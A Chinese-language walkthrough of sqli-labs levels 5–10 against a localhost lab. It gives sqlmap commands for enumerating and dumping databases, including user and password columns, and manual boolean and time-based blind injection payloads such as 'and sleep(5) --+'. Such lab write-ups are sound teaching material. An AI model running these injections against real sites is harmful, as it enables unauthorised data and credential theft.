sqli-labs5-10(全程sqlmap)
sqlmap注入教程:https://www.cnblogs.com/ichunqiu/p/5805108.html
前五关直接可以用默认的sqlmap语法跑:
python sqlmap.py -u "http://xxxxx/x?id=1" --dbs(或者--current-db)
python sqlmap.py -u "http://xxxxx/x?id=1" -D database_name --tables
python sqlmap.py -u "http://xxxxx/x?id=1" -D database_name -T table_name --columns
python sqlmap.py -u "http://xxxxx/x?id=1" -D database_name -T table_name -C "id,user,password" --dumps
0x00 主要使用的语句
1:用于验证时间延迟型的盲注:?id=1’ and sleep(5) --+
2.用于判断布尔型盲注:?id=1’ and 1=1 --+ , ?id=1‘ and 2=1 --
sqlmap主要使用的语句:
python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-8/?id=1 --technique B --dbms mysql --dbs --batch -v 0 或者 python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --current-db --batch
其中的—technique是为sqlmap中的注入技术,在sqlmap中其支持5中不同模式的注入
B:Boolean-based-blind (布尔型盲注) E:Error-based (报错型注入) U:Union query-based (联合注入) S:Starked queries (通过sqlmap读取文件系统、操作系统、注册表必须 使用该参数,可多语句查询注入) T:Time-based blind (基于时间延迟注入)
我们可以根据不同的报错提示更改—technique后面的字母
—dbms : 不仅可以指定数据库类型,还可以指定数据库版本 --batch: 用此参数,不需要用户输入,将会使用sqlmap提示的默认值一直运行下去。 -v 0参数只是为了更好的截图.
0x02 sqli-labs less-5、6
手工发现只能用报错注入,5关是单引号闭合,6关是双引号闭合
那么sqlmap语句:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-5/?id=1" --technique E --dbs --batch
成功爆出数据库
0x03 sqli-labs less-7
这道题手工的话意思是叫我们用sql的写入命令:into outfile
正确回显一串不变的字符串,错误不报错误信息,因此可以用sqlmap跑盲注
语句:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-7/?id=1" --technique B --current-db --batch
0x04 sqli-labs less-8
错误不回显报错信息,正确只回显一个固定的字符串,同样是一个布尔型盲注
跟第七关的payload一样:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --current-db --batch
0x05 sqli-labs less-9、10
不管怎么样都不报错,也没有回显区别,不管对错一直显示一个固定的页面;
那么我们只有试着闭合,然后用测试语句“and sleep(5)”试一下,如果没猜出来闭合规则,那么我们直接放在sqlmap里面跑时间盲注;
这里用了闭合规则‘--+,里面跟and sleep(5)发现延时5秒,那么确定是时间盲注了。
sqlmap语句:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-9/?id=1" --technique T --current-db --batch
第十关就是闭合规则是双引号而已,其他的一样